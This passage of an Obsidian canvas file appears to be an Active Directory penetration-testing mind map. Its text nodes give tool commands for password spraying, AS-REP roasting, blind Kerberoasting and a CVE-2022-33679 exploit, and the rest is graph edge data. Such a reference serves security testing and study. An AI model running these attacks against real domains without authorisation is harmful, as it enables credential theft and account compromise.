		{"id":"93df661896ba6f71","type":"text","text":"###### CLEAR TEXT CREDENTIALS FOUND","x":-5642,"y":1948,"width":360,"height":50,"color":"4"},
		{"id":"21c6c496d5100d94","type":"text","text":"# 🔥 Password Spray\n>[!warning] Get the password policy (need creds, but you should get the policy before spray)\n>- 🕷️ `nxc <ip> -u '<user>' -p '<password>' --pass-pol`\n>- ⚪ `enum4linux -u '<username>' -p <password> -P <ip>`\n>- 🔵 `Get-ADDefaultDomainPasswordPolicy`\n>- 🔵 `Get-ADFineGrainedPolicy -filter *`\n>- 🔵 `Get-ADUserResultantPasswordPolicy -Identity <user>`\n>- ⚪ `ldapsearch-ad.py --server '<dc>' -d <domain> -u <user> -p <password> --type pass-pols`\n\n- 🕷️ `nxc smb <dc_ip> -u <user_list> -p <password_list> --no-bruteforce` # test user = password\n- 🕷️ `nxc smb <dc_ip> -u <user_list> -p <password_list>` # multiple test (carrefull of lock policy)\n- ⚪ `sprayhound -U <user_list> -d <domain> -dc <dc_ip>`","x":-6700,"y":1765,"width":1018,"height":415,"color":"#2c65c9"},
		{"id":"c0e74800fff96ce7","type":"text","text":"# [[AS-REPRoasting]]\n>[!info] Get ASREPRoastable users (need credentials) : \n>- 🟡 `Get-DomainUser -PreauthNotRequired -Properties SamAccountName`\n>- 🔴 `MATCH (u:User {dontreqpreauth:true}), (c:Computer), p=shortestPatch((u)-[*1..]->(c)) RETURN p`\n\n- 🟣 `GetNPUsers.py <domain>/ -userfile <username_list> -format hashcat -outputfile <hashes.txt>`\n- 🔵 `Rubeus.exe asreproast /format:hashcat`\n \n","x":-6700,"y":2199,"width":1018,"height":280,"color":"#2c65c9"},
		{"id":"73a2dec05f6e3602","type":"text","text":"###### HASH FOUND (TGT)","x":-5522,"y":2311,"width":240,"height":57,"color":"2"},
		{"id":"f43c454450e95ac7","type":"text","text":"# Blind Kerberoasting\n- 🟣 `GetUserSPNs.py -no-preauth \"<asrep_user> \" -userfile <username_list> -dc-host \"<dc_ip>\" \"<domain>\"/`\n- 🔵 `Rubeus.exe kerberoast /domain:<domain> /dc:<dc_ip> /nopreauth:<asrep_user> /spns:<users.list>`\n \n","x":-6700,"y":2510,"width":1018,"height":140,"color":"#2c65c9"},
		{"id":"bd092c984dcdeccc","type":"text","text":"# 💥 CVE-2022-33679\n- ⚪ `python3 CVE-2022-33679.py <domain>/<user> <target>`\n \n","x":-6700,"y":2680,"width":1018,"height":120,"color":"#2c65c9"},
		{"id":"1f8ca7fdd2a4cb17","x":1223,"y":5269,"width":797,"height":691,"type":"text","text":"# Attack Name\n\n## Subattack\n\n>[!info] Theory\n>-\n>-\n>-\n\n>[!example] Tools\n>-\n>-\n>-\n\n```shell\n#Commands\n\n⚪ : Linux commands\n⚫ : CMD commands\n🔵 : Powershell commands\n🟣 : Impackets\n🔴 : Bloodhound \n🟡 : Powerview\n🕷️ : Netexec\nⓂ️ : Metasploit\n\n```"}
	],
	"edges":[
		{"id":"a6a50582cc52f252","fromNode":"11b392e3acb18b92","fromSide":"right","toNode":"da11d926b3d13476","toSide":"left","color":"1"},
		{"id":"1d927d3a65ff8187","fromNode":"ad93a25aef8ed5a4","fromSide":"right","toNode":"da11d926b3d13476","toSide":"left","color":"1"},
		{"id":"c2038cf714b795cc","fromNode":"b16618c87aa4008a","fromSide":"right","toNode":"da11d926b3d13476","toSide":"left","color":"1"},
		{"id":"7d47133cd9ac7845","fromNode":"54b1fa6c5af005ec","fromSide":"right","toNode":"da11d926b3d13476","toSide":"left","color":"1"},
		{"id":"1708083b49cb1118","fromNode":"48ab6d969705cfd2","fromSide":"right","toNode":"da11d926b3d13476","toSide":"left","color":"1"},
		{"id":"57bb363b7563b987","fromNode":"9f3a048494731715","fromSide":"right","toNode":"da11d926b3d13476","toSide":"left","color":"1"},
		{"id":"e66c699532cd3c39","fromNode":"c0247957c389b335","fromSide":"right","toNode":"da11d926b3d13476","toSide":"left","color":"1"},
		{"id":"0b193dba2d3853f0","fromNode":"c85b03b54484ba38","fromSide":"right","toNode":"da11d926b3d13476","toSide":"left","color":"1"},
		{"id":"c2915f9cc03251fc","fromNode":"34187a56d891a1a8","fromSide":"right","toNode":"da11d926b3d13476","toSide":"left","color":"1"},
		{"id":"c89802781c1c5b43","fromNode":"ee053d26291636fb","fromSide":"right","toNode":"da11d926b3d13476","toSide":"left","color":"1"},
		{"id":"803ded555a430863","fromNode":"11b392e3acb18b92","fromSide":"right","toNode":"4b2bb45c138768ef","toSide":"left","color":"6"},
		{"id":"00ede485d1abd7fe","fromNode":"ad93a25aef8ed5a4","fromSide":"right","toNode":"4b2bb45c138768ef","toSide":"left","color":"6"},
		{"id":"4286b452712db750","fromNode":"b16618c87aa4008a","fromSide":"right","toNode":"4b2bb45c138768ef","toSide":"left","color":"6"},
		{"id":"1b5ec913cf08c8d7","fromNode":"54b1fa6c5af005ec","fromSide":"right","toNode":"4b2bb45c138768ef","toSide":"left","color":"6"},
		{"id":"74dc5397915254ab","fromNode":"48ab6d969705cfd2","fromSide":"right","toNode":"4b2bb45c138768ef","toSide":"left","color":"6"},
		{"id":"69b07069ce07de7f","fromNode":"9f3a048494731715","fromSide":"right","toNode":"4b2bb45c138768ef","toSide":"left","color":"6"},
		{"id":"9e1f801ab72401be","fromNode":"c0247957c389b335","fromSide":"right","toNode":"4b2bb45c138768ef","toSide":"left","color":"6"},
		{"id":"07ee6368f16c28fa","fromNode":"c85b03b54484ba38","fromSide":"right","toNode":"4b2bb45c138768ef","toSide":"left","color":"6"},
		{"id":"1647d4ac051b50bc","fromNode":"34187a56d891a1a8","fromSide":"right","toNode":"4b2bb45c138768ef","toSide":"left","color":"6"},
		{"id":"9778e017a188dde7","fromNode":"ee053d26291636fb","fromSide":"right","toNode":"4b2bb45c138768ef","toSide":"left","color":"6"},
		{"id":"b110a101212bbffa","fromNode":"ee053d26291636fb","fromSide":"right","toNode":"03d358dabc1f2314","toSide":"left"},
		{"id":"79b0b723aa5695e7","fromNode":"34187a56d891a1a8","fromSide":"right","toNode":"03d358dabc1f2314","toSide":"left"},
		{"id":"48d9dcb9765cf3fd","fromNode":"54b1fa6c5af005ec","fromSide":"right","toNode":"03d358dabc1f2314","toSide":"left"},
		{"id":"86f424557ecd2481","fromNode":"48ab6d969705cfd2","fromSide":"right","toNode":"03d358dabc1f2314","toSide":"left"},
		{"id":"c98af29306d49fad","fromNode":"9f3a048494731715","fromSide":"right","toNode":"03d358dabc1f2314","toSide":"left"},
		{"id":"5184661290419f05","fromNode":"c0247957c389b335","fromSide":"right","toNode":"03d358dabc1f2314","toSide":"left"},
		{"id":"4d8accbcf59376af","fromNode":"c85b03b54484ba38","fromSide":"right","toNode":"03d358dabc1f2314","toSide":"left"},
		{"id":"1302f271e8b48cef","fromNode":"1bf86342b08cb8e8","fromSide":"right","toNode":"3dd4f510abda2abd","toSide":"left","color":"#0e0c27"},
		{"id":"50890d9423cf6d85","fromNode":"21c6c496d5100d94","fromSide":"right","toNode":"93df661896ba6f71","toSide":"left","color":"4"},
		{"id":"82849c4518c29426","fromNode":"c0e74800fff96ce7","fromSide":"right","toNode":"73a2dec05f6e3602","toSide":"left","color":"2"},
		{"id":"a6e55186a17b0d99","fromNode":"f43c454450e95ac7","fromSide":"right","toNode":"2db44ec13f029b46","toSide":"left","color":"2"},
		{"id":"922ed6f0fec029ef","fromNode":"bd092c984dcdeccc","fromSide":"right","toNode":"cd5befaf41c3d555","toSide":"left","color":"#0e0c27"},
		{"id":"7a151ef68476ceb2","fromNode":"2ef6d2610896eb38","fromSide":"right","toNode":"789cb0bc8fc38e27","toSide":"left"},
		{"id":"3aa86583396a001a","fromNode":"7a0b9b60fd58a854","fromSide":"right","toNode":"789cb0bc8fc38e27","toSide":"left"},
		{"id":"834d0130972841d9","fromNode":"17f6f195c606b7c0","fromSide":"right","toNode":"789cb0bc8fc38e27","toSide":"left"},
		{"id":"7edff402e4da3587","fromNode":"789cb0bc8fc38e27","fromSide":"right","toNode":"b725b04e8755e297","toSide":"left"},
		{"id":"847b20ab7eb13f83","fromNode":"789cb0bc8fc38e27","fromSide":"right","toNode":"c2393c971ddeebac","toSide":"left"},
		{"id":"14aab63cf7f73829","fromNode":"789cb0bc8fc38e27","fromSide":"right","toNode":"2f414db711360a7c","toSide":"left"},
		{"id":"e98d03f49551650e","fromNode":"789cb0bc8fc38e27","fromSide":"right","toNode":"db137f8c979db56b","toSide":"left"},
		{"id":"aa3c3f1c14e21a49","fromNode":"db137f8c979db56b","fromSide":"right","toNode":"2bd0faedfbf03299","toSide":"left"},
		{"id":"b2c23842272d743b","fromNode":"b725b04e8755e297","fromSide":"right","toNode":"b32110d36ae83435","toSide":"left"},
		{"id":"0c4822a045e30705","fromNode":"c2393c971ddeebac","fromSide":"right","toNode":"95955126bf8e010a","toSide":"left"},
		{"id":"f124ea5b10440f7c","fromNode":"2f414db711360a7c","fromSide":"right","toNode":"ac9c574b52fbe02c","toSide":"left"},
		{"id":"96edf64380f003b2","fromNode":"1da6677ae8f7e8a9","fromSide":"right","toNode":"85f826f0310f772e","toSide":"left"},
		{"id":"cd32f96fe714f39d","fromNode":"85f826f0310f772e","fromSide":"right","toNode":"9857de892869bb7b","toSide":"left"},
		{"id":"15f1ae5f35dbe20c","fromNode":"85f826f0310f772e","fromSide":"right","toNode":"001e63d03931ee8e","toSide":"left"},
		{"id":"7a3ad8f47475da96","fromNode":"f68fec1905c4667e","fromSide":"right","toNode":"a0649b6fb6d7f5c3","toSide":"left"},
		{"id":"ee07310b00e973a7","fromNode":"be9c1bb18e261d15","fromSide":"right","toNode":"d52e894f7172291a","toSide":"left"},
		{"id":"74cbe186110d260d","fromNode":"001e63d03931ee8e","fromSide":"right","toNode":"5d60393c351fe84d","toSide":"left"},
		{"id":"5b4d48aefcd7319f","fromNode":"be9c1bb18e261d15","fromSide":"right","toNode":"28210b6a4105561b","toSide":"left"},
		{"id":"fddae5afd4b89fda","fromNode":"28210b6a4105561b","fromSide":"right","toNode":"ccf5e832d3a11577","toSide":"left"},
		{"id":"c7522645024b6a7f","fromNode":"e2e61aab56bf55a4","fromSide":"right","toNode":"6c7f430bd5ba0a4f","toSide":"left"},
		{"id":"0a62e5f859efcd64","fromNode":"c05816514e5c01c4","fromSide":"right","toNode":"2159909e792c0a61","toSide":"left"},
		{"id":"20940f8e7bd8e4b0","fromNode":"c05816514e5c01c4","fromSide":"right","toNode":"dbfe48fd23ce2482","toSide":"left"},
		{"id":"18bb88ddcbdb42c5","fromNode":"2159909e792c0a61","fromSide":"right","toNode":"1428c686bf497881","toSide":"left","color":"2"},
		{"id":"4dafa2cb2388257e","fromNode":"2159909e792c0a61","fromSide":"right","toNode":"33bd96f32fbf44e3","toSide":"left","color":"2"},
		{"id":"03bd5775b9bc7e32","fromNode":"2159909e792c0a61","fromSide":"right","toNode":"02122e030ba48b6e","toSide":"left","color":"#4443a3"},
		{"id":"bb486b3f70106643","fromNode":"dbfe48fd23ce2482","fromSide":"right","toNode":"1428c686bf497881","toSide":"left","color":"2"},
		{"id":"3fd0e9918624dd3e","fromNode":"dbfe48fd23ce2482","fromSide":"right","toNode":"33bd96f32fbf44e3","toSide":"left","color":"2"},
		{"id":"dc0fe4488ffc54c4","fromNode":"dbfe48fd23ce2482","fromSide":"right","toNode":"02122e030ba48b6e","toSide":"left","color":"#4443a3"},
		{"id":"6a19fdf3eb3369e2","fromNode":"670754020be214b1","fromSide":"right","toNode":"2dcf501997be2fb2","toSide":"left"},
		{"id":"d792ea8ad6a88055","fromNode":"2dcf501997be2fb2","fromSide":"right","toNode":"7a0b9b60fd58a854","toSide":"left"},
		{"id":"fe8121721d3e03ea","fromNode":"670754020be214b1","fromSide":"right","toNode":"34ade41f491a3d5b","toSide":"left"},
		{"id":"b813d0c7385eba3e","fromNode":"34ade41f491a3d5b","fromSide":"right","toNode":"2ef6d2610896eb38","toSide":"left"},
		{"id":"9dd753bc0efaa29b","fromNode":"76879583581dac73","fromSide":"right","toNode":"4ae129df164ce3ce","toSide":"left"},
		{"id":"1ccf4a0f38ea959e","fromNode":"e5cd021d720fc19d","fromSide":"right","toNode":"5705b9ca52b582cd","toSide":"left"},
		{"id":"540156b1087564af","fromNode":"e5cd021d720fc19d","fromSide":"right","toNode":"daa6761c34288f00","toSide":"left"},
		{"id":"cd1a2e6616d63d16","fromNode":"daa6761c34288f00","fromSide":"right","toNode":"37aea7f7397ead68","toSide":"left"},
		{"id":"711f5497cb3a484c","fromNode":"c701bb029d4e4fea","fromSide":"right","toNode":"faeba0d1a0aa233c","toSide":"left"},
		{"id":"093c95cc8025fbad","fromNode":"faeba0d1a0aa233c","fromSide":"right","toNode":"2957d653e2ebf9b5","toSide":"left"},
		{"id":"69db02ee0979f2f6","fromNode":"c701bb029d4e4fea","fromSide":"right","toNode":"a8718e8eb16f9d1e","toSide":"left"},
		{"id":"35dcf39b2effebd8","fromNode":"a8718e8eb16f9d1e","fromSide":"right","toNode":"7380324d95dd3c35","toSide":"left"},
		{"id":"83b07041078a4a83","fromNode":"7380324d95dd3c35","fromSide":"right","toNode":"9c562e5de092c0ad","toSide":"left"},
		{"id":"c67d1b7dc8b94ef9","fromNode":"c701bb029d4e4fea","fromSide":"right","toNode":"67663966dd2f0c86","toSide":"left"},
		{"id":"953519053b69bf1c","fromNode":"c701bb029d4e4fea","fromSide":"right","toNode":"3a24641aae49651c","toSide":"left"},
		{"id":"31c65f1b3c2818dd","fromNode":"67663966dd2f0c86","fromSide":"right","toNode":"862baf5b0391d60a","toSide":"left"},
		{"id":"791fa479ac6798f9","fromNode":"862baf5b0391d60a","fromSide":"right","toNode":"eb27e4ad299d1883","toSide":"left"},
		{"id":"968d3059bae3ead5","fromNode":"3a24641aae49651c","fromSide":"right","toNode":"bb800896d678e126","toSide":"left"},
		{"id":"e3bac4976bf8c064","fromNode":"bb800896d678e126","fromSide":"right","toNode":"7376b0c07bbb81e5","toSide":"left"},
		{"id":"4027831b676c2e6c","fromNode":"b1cf230b9e256ed7","fromSide":"right","toNode":"0e528726accacaa0","toSide":"left"},
		{"id":"9b5e3efc5f164382","fromNode":"41b126d073e8cabe","fromSide":"right","toNode":"c30c67bc1c111165","toSide":"left"},
		{"id":"e400986942c96cea","fromNode":"76ad10e31f955321","fromSide":"right","toNode":"c30c67bc1c111165","toSide":"left"},
		{"id":"e75b3ad78f18c2bc","fromNode":"692ed4a9a99c67b0","fromSide":"right","toNode":"c30c67bc1c111165","toSide":"left"},
		{"id":"3388f050e56f0319","fromNode":"bc47b0c846eb0a33","fromSide":"right","toNode":"0016ccb346181884","toSide":"left"},
		{"id":"34b7cd69ddcf8991","fromNode":"3bc8c5a5f39bc962","fromSide":"right","toNode":"0016ccb346181884","toSide":"left"},
		{"id":"478a064e80927f0c","fromNode":"25e7ab93daeb164c","fromSide":"right","toNode":"6a639a7cfec0a00a","toSide":"left"},
		{"id":"ec3f15b507a8903c","fromNode":"65ba0771b00171ba","fromSide":"right","toNode":"bb306da839d61057","toSide":"left"},
		{"id":"b8ee40af77cf1f1b","fromNode":"65ba0771b00171ba","fromSide":"right","toNode":"34819c844e77a2ab","toSide":"left"},
		{"id":"2bdf8e5521b3be99","fromNode":"65ba0771b00171ba","fromSide":"right","toNode":"7b385487f48d5ef7","toSide":"left"},
		{"id":"c978c3a7421f61bb","fromNode":"54e57561f98b7ef2","fromSide":"right","toNode":"1ae082cde5839a47","toSide":"left"},
		{"id":"d4249268427dbef5","fromNode":"c2b010f4e306211f","fromSide":"right","toNode":"670754020be214b1","toSide":"left"},
		{"id":"367c0d5433aa55a9","fromNode":"c2b010f4e306211f","fromSide":"right","toNode":"17f6f195c606b7c0","toSide":"left"},
		{"id":"2b5ad290bef513bf","fromNode":"c2b010f4e306211f","fromSide":"right","toNode":"1da6677ae8f7e8a9","toSide":"left"},
		{"id":"bb73f130b6d3c80b","fromNode":"c2b010f4e306211f","fromSide":"right","toNode":"be9c1bb18e261d15","toSide":"left"},
		{"id":"adb034a748d94796","fromNode":"c2b010f4e306211f","fromSide":"right","toNode":"76879583581dac73","toSide":"left"},
		{"id":"b6bb33f773013b3c","fromNode":"c2b010f4e306211f","fromSide":"right","toNode":"d9007a482e22c659","toSide":"left"},
		{"id":"31cc3dac88300cba","fromNode":"c2b010f4e306211f","fromSide":"right","toNode":"5f2413fa4d01c14d","toSide":"left"},
		{"id":"9321b5f035c7557e","fromNode":"5f2413fa4d01c14d","fromSide":"right","toNode":"c167c0d06d1c881e","toSide":"left"},
		{"id":"512987c264129c72","fromNode":"c167c0d06d1c881e","fromSide":"right","toNode":"d3012fa932bbfa77","toSide":"left"},
		{"id":"4ee5aa1ea68a466e","fromNode":"d3012fa932bbfa77","fromSide":"right","toNode":"a7a2896b03a06edd","toSide":"left"},
		{"id":"3d0ac417ead59bde","fromNode":"85f826f0310f772e","fromSide":"right","toNode":"f68fec1905c4667e","toSide":"left"},
		{"id":"a246b73b73da9d7b","fromNode":"ce9731f06ac9b669","fromSide":"right","toNode":"4f8cb48c8b12ae99","toSide":"left"},
		{"id":"483bee516448e843","fromNode":"4f8cb48c8b12ae99","fromSide":"right","toNode":"916e0b10a9c887fa","toSide":"left"},
		{"id":"ed3242cb44bf80fb","fromNode":"916e0b10a9c887fa","fromSide":"right","toNode":"e2e61aab56bf55a4","toSide":"left"},
		{"id":"178302a791d0ba13","fromNode":"ca2551b5c98b60d4","fromSide":"right","toNode":"006f6db58f5ecd62","toSide":"left"},
		{"id":"9af8de154a694566","fromNode":"006f6db58f5ecd62","fromSide":"right","toNode":"cec2ba1e862c4aca","toSide":"left"},
		{"id":"f8d2daf2e6e109e8","fromNode":"9857de892869bb7b","fromSide":"right","toNode":"4f8ce4840558fe8e","toSide":"left"},
		{"id":"4ab2da9d962aab26","fromNode":"3015edbb972e1820","fromSide":"right","toNode":"9dc8a6b3c53cabaa","toSide":"left"},
		{"id":"7d491a0d23914136","fromNode":"3015edbb972e1820","fromSide":"right","toNode":"f05d50dde76fe618","toSide":"left"},
		{"id":"8feb06203a41a223","fromNode":"3015edbb972e1820","fromSide":"right","toNode":"b28a0d771dd4971b","toSide":"left"},
		{"id":"18f4f42a75083aa7","fromNode":"3015edbb972e1820","fromSide":"right","toNode":"1430b00e84152755","toSide":"left"},
		{"id":"4efa4c588a01f1a8","fromNode":"3015edbb972e1820","fromSide":"right","toNode":"388c4acd41c471e4","toSide":"left"},
		{"id":"a484db8a1b508981","fromNode":"3015edbb972e1820","fromSide":"right","toNode":"bbae7070c2811ae0","toSide":"left"},
		{"id":"c79398e8d30626e6","fromNode":"3015edbb972e1820","fromSide":"right","toNode":"65ba0771b00171ba","toSide":"left"},
		{"id":"99e66ca5d987f6a3","fromNode":"3015edbb972e1820","fromSide":"right","toNode":"54e57561f98b7ef2","toSide":"left"},
		{"id":"9ad86850831872f3","fromNode":"dd7059f977e01545","fromSide":"right","toNode":"e5cd021d720fc19d","toSide":"left"},
		{"id":"a2d3a758a2965b1f","fromNode":"dd7059f977e01545","fromSide":"right","toNode":"c701bb029d4e4fea","toSide":"left"},
		{"id":"7171d27cb412d324","fromNode":"6739c4820c8b6371","fromSide":"right","toNode":"c2b010f4e306211f","toSide":"left"},
		{"id":"5250be601072ce39","fromNode":"6739c4820c8b6371","fromSide":"right","toNode":"c05816514e5c01c4","toSide":"left"},
		{"id":"0587c9b1fa0224d4","fromNode":"6739c4820c8b6371","fromSide":"right","toNode":"ca2551b5c98b60d4","toSide":"left"},
		{"id":"fb1deace7f4b3840","fromNode":"785c898ae427bffa","fromSide":"right","toNode":"7adcda0adfe3120c","toSide":"left"},
		{"id":"b78c9312a0369d1b","fromNode":"7adcda0adfe3120c","fromSide":"right","toNode":"ea6a21ad25a26f3d","toSide":"left"},
		{"id":"26ab9632e3a7f41b","fromNode":"7adcda0adfe3120c","fromSide":"right","toNode":"a1026363af16faa8","toSide":"left"},
		{"id":"fa761290169b54b2","fromNode":"a1026363af16faa8","fromSide":"right","toNode":"1fee7411ae40891e","toSide":"left"},
		{"id":"699d2c14ec18d072","fromNode":"785c898ae427bffa","fromSide":"right","toNode":"122a4639563d0a19","toSide":"left"},
		{"id":"b2a69e42df9efadb","fromNode":"122a4639563d0a19","fromSide":"right","toNode":"253142c880431a69","toSide":"left"},
		{"id":"f4c6e75daca21f8a","fromNode":"1fee7411ae40891e","fromSide":"right","toNode":"d7fcddef7c5e9978","toSide":"left","color":"#db63e3"},
		{"id":"d706f5eb94d32d89","fromNode":"253142c880431a69","fromSide":"right","toNode":"d7fcddef7c5e9978","toSide":"left","color":"#db63e3"},
		{"id":"09b034d93f9ce5e8","fromNode":"785c898ae427bffa","fromSide":"right","toNode":"ea4004269251f3a5","toSide":"left"},
		{"id":"a54eaf91eafe678b","fromNode":"ea4004269251f3a5","fromSide":"right","toNode":"a187bd39018f9b2f","toSide":"left"},
		{"id":"907384f5de301e9e","fromNode":"ea4004269251f3a5","fromSide":"right","toNode":"fd8ee50425c066b0","toSide":"left"},
		{"id":"a73ecef348785310","fromNode":"a187bd39018f9b2f","fromSide":"right","toNode":"d7fcddef7c5e9978","toSide":"left","color":"#db63e3"},
		{"id":"1953583a9bd54a89","fromNode":"fd8ee50425c066b0","fromSide":"right","toNode":"d7fcddef7c5e9978","toSide":"left","color":"#db63e3"},
		{"id":"ef3547c094cf03b9","fromNode":"875f19bbf148476d","fromSide":"right","toNode":"d6c598adab3a2f92","toSide":"left"},
		{"id":"8ea1de0716b2b7cd","fromNode":"14457bd46e7ba67f","fromSide":"right","toNode":"875f19bbf148476d","toSide":"left"},
		{"id":"359f637591aca3bd","fromNode":"b8dae52ffdac2f8a","fromSide":"right","toNode":"d7fcddef7c5e9978","toSide":"left","color":"#ab54a4"},
		{"id":"48e271af8cc96467","fromNode":"efbc830114eff45d","fromSide":"right","toNode":"d7fcddef7c5e9978","toSide":"left","color":"#ab54a4"},
		{"id":"60f4c9ac2016e494","fromNode":"d6c598adab3a2f92","fromSide":"right","toNode":"d7fcddef7c5e9978","toSide":"left","color":"#ab54a4"},
		{"id":"26a6f2745f4e2ab2","fromNode":"785c898ae427bffa","fromSide":"right","toNode":"b8dae52ffdac2f8a","toSide":"left"},
		{"id":"839da3b6998182e6","fromNode":"785c898ae427bffa","fromSide":"right","toNode":"efbc830114eff45d","toSide":"left"},
		{"id":"7a94b5c244f920ef","fromNode":"785c898ae427bffa","fromSide":"right","toNode":"14457bd46e7ba67f","toSide":"left"},
		{"id":"189c3c9d1a4d6ad5","fromNode":"d9007a482e22c659","fromSide":"top","toNode":"541337b61b300092","toSide":"bottom","color":"#416bbe"},
		{"id":"ce502e5a9533c99a","fromNode":"96e4a6c304948f6c","fromSide":"right","toNode":"1ea1dd1462779b8b","toSide":"left"},
		{"id":"7478d9a07867b13c","fromNode":"785c898ae427bffa","fromSide":"right","toNode":"96e4a6c304948f6c","toSide":"left"},
		{"id":"00d51b1a06ff62a6","fromNode":"1ea1dd1462779b8b","fromSide":"right","toNode":"d7fcddef7c5e9978","toSide":"left","color":"#b45eba"},
		{"id":"d84182de99e610c6","fromNode":"0a1bf2eb0c3ce934","fromSide":"right","toNode":"dd00ff085f651ea5","toSide":"left"},
		{"id":"ae3eea2f7f815862","fromNode":"dd00ff085f651ea5","fromSide":"right","toNode":"d7fcddef7c5e9978","toSide":"left","color":"#b45eba"},
		{"id":"bbaf1976d6a144d6","fromNode":"785c898ae427bffa","fromSide":"right","toNode":"0a1bf2eb0c3ce934","toSide":"left"},
		{"id":"681a2f915074fd8b","fromNode":"785c898ae427bffa","fromSide":"right","toNode":"5601b5033b6b975e","toSide":"left"},
		{"id":"514966307bc8e724","fromNode":"5601b5033b6b975e","fromSide":"right","toNode":"0b0cc489b2f53a2b","toSide":"left"},
		{"id":"c129f2c27ce8561a","fromNode":"874eb7aa0cb6f112","fromSide":"right","toNode":"61ffb9aeef9dc609","toSide":"left"},
		{"id":"9ea8c7fd319f3e3b","fromNode":"785c898ae427bffa","fromSide":"right","toNode":"874eb7aa0cb6f112","toSide":"left"},
		{"id":"fddf020ed4609088","fromNode":"0b0cc489b2f53a2b","fromSide":"right","toNode":"d7fcddef7c5e9978","toSide":"left","color":"#b45eba"},
		{"id":"e8d59ebe770cfc62","fromNode":"61ffb9aeef9dc609","fromSide":"right","toNode":"d7fcddef7c5e9978","toSide":"left","color":"#b45eba"},
		{"id":"c85344afab662a6d","fromNode":"ea6a21ad25a26f3d","fromSide":"right","toNode":"d7fcddef7c5e9978","toSide":"left","color":"#d058c0"},
		{"id":"84ea5c989a6c4be1","fromNode":"ea6a21ad25a26f3d","fromSide":"right","toNode":"e2dc483bd8ccf9e9","toSide":"left","color":"1"},
		{"id":"eccf9143ad0075d1","fromNode":"1fee7411ae40891e","fromSide":"right","toNode":"e2dc483bd8ccf9e9","toSide":"left","color":"1"},
		{"id":"247cff2bdc1018d5","fromNode":"253142c880431a69","fromSide":"right","toNode":"e2dc483bd8ccf9e9","toSide":"left","color":"1"},
		{"id":"307ac7f34577e845","fromNode":"a187bd39018f9b2f","fromSide":"right","toNode":"e2dc483bd8ccf9e9","toSide":"left","color":"1"},
		{"id":"c35c83b397607081","fromNode":"fd8ee50425c066b0","fromSide":"right","toNode":"e2dc483bd8ccf9e9","toSide":"left","color":"1"},
		{"id":"32d4f19e1b54c724","fromNode":"1ea1dd1462779b8b","fromSide":"right","toNode":"e2dc483bd8ccf9e9","toSide":"left","color":"1"},
		{"id":"ca92b20707215589","fromNode":"dd00ff085f651ea5","fromSide":"right","toNode":"e2dc483bd8ccf9e9","toSide":"left","color":"1"},
		{"id":"d93966ee4aacb12a","fromNode":"0b0cc489b2f53a2b","fromSide":"right","toNode":"e2dc483bd8ccf9e9","toSide":"left","color":"1"},
		{"id":"63b47a85ae16c07b","fromNode":"61ffb9aeef9dc609","fromSide":"right","toNode":"e2dc483bd8ccf9e9","toSide":"left","color":"1"},
		{"id":"a12167edcbbae269","fromNode":"b8dae52ffdac2f8a","fromSide":"right","toNode":"e2dc483bd8ccf9e9","toSide":"left","color":"1"},
		{"id":"791b6c0ab337ef80","fromNode":"efbc830114eff45d","fromSide":"right","toNode":"e2dc483bd8ccf9e9","toSide":"left","color":"1"},
		{"id":"94d3cb99e0c9db2e","fromNode":"d6c598adab3a2f92","fromSide":"right","toNode":"e2dc483bd8ccf9e9","toSide":"left","color":"1"},
		{"id":"dc5b6a21f9438c31","fromNode":"ea6a21ad25a26f3d","fromSide":"right","toNode":"7873ce17589aa035","toSide":"left"},
		{"id":"743f57fe95b508c7","fromNode":"1fee7411ae40891e","fromSide":"right","toNode":"7873ce17589aa035","toSide":"left"},
		{"id":"9e76a7a6d753cf3f","fromNode":"253142c880431a69","fromSide":"right","toNode":"7873ce17589aa035","toSide":"left"},
		{"id":"85b4effbe1ea0fd1","fromNode":"a187bd39018f9b2f","fromSide":"right","toNode":"7873ce17589aa035","toSide":"left"},
		{"id":"e305d7adb26b02b5","fromNode":"fd8ee50425c066b0","fromSide":"right","toNode":"7873ce17589aa035","toSide":"left"},
		{"id":"c2bf678b690729ed","fromNode":"1ea1dd1462779b8b","fromSide":"right","toNode":"7873ce17589aa035","toSide":"left"},
		{"id":"ff02c54733106c94","fromNode":"dd00ff085f651ea5","fromSide":"right","toNode":"7873ce17589aa035","toSide":"left"},
		{"id":"3dfd7fb2d1feef04","fromNode":"0b0cc489b2f53a2b","fromSide":"right","toNode":"7873ce17589aa035","toSide":"left"},
		{"id":"b16026ab7af5beae","fromNode":"61ffb9aeef9dc609","fromSide":"right","toNode":"7873ce17589aa035","toSide":"left"},
		{"id":"6892d1b6b6293177","fromNode":"b8dae52ffdac2f8a","fromSide":"right","toNode":"7873ce17589aa035","toSide":"left"},
		{"id":"8c1fbb07c17925e4","fromNode":"efbc830114eff45d","fromSide":"right","toNode":"7873ce17589aa035","toSide":"left"},
		{"id":"49bb460d76416c4f","fromNode":"d6c598adab3a2f92","fromSide":"right","toNode":"7873ce17589aa035","toSide":"left"},
		{"id":"80f067c7744ad5be","fromNode":"b61c915f2f57038d","fromSide":"right","toNode":"f26b5a7d3145c1b3","toSide":"left"},
		{"id":"a0018b3318e4fec8","fromNode":"785c898ae427bffa","fromSide":"right","toNode":"b61c915f2f57038d","toSide":"left"},
		{"id":"168d679783f24560","fromNode":"f26b5a7d3145c1b3","fromSide":"right","toNode":"942dba13409879bf","toSide":"left"},
		{"id":"8484fa2ff0b8ce8e","fromNode":"3ea4a8bc304baecf","fromSide":"right","toNode":"0bd291135572da94","toSide":"left"},
		{"id":"841971e0ab5b9a1b","fromNode":"3ea4a8bc304baecf","fromSide":"right","toNode":"d9007a482e22c659","toSide":"left"},
		{"id":"d21ee25d441c772b","fromNode":"3ea4a8bc304baecf","fromSide":"right","toNode":"541337b61b300092","toSide":"left"},
		{"id":"b10bc02233f3ecd2","fromNode":"5705b9ca52b582cd","fromSide":"right","toNode":"fe4f4339e873434f","toSide":"left"},
		{"id":"63d70078fd6df37c","fromNode":"37aea7f7397ead68","fromSide":"right","toNode":"497a9278ba659d0e","toSide":"left"},
		{"id":"6ca89494c561e626","fromNode":"ad750d36e7cbce0f","fromSide":"right","toNode":"c867dcbe12b58237","toSide":"top","color":"#e179dd"},
		{"id":"94e82d25443edfcc","fromNode":"d60307aadf1a5784","fromSide":"top","toNode":"ad750d36e7cbce0f","toSide":"left"},
		{"id":"68899e40b6277a84","fromNode":"d60307aadf1a5784","fromSide":"right","toNode":"c867dcbe12b58237","toSide":"left","color":"#e179dd"},
		{"id":"c5e77f2234dde86b","fromNode":"371b1b37981f41b3","fromSide":"bottom","toNode":"c867dcbe12b58237","toSide":"right","color":"#e179dd"},
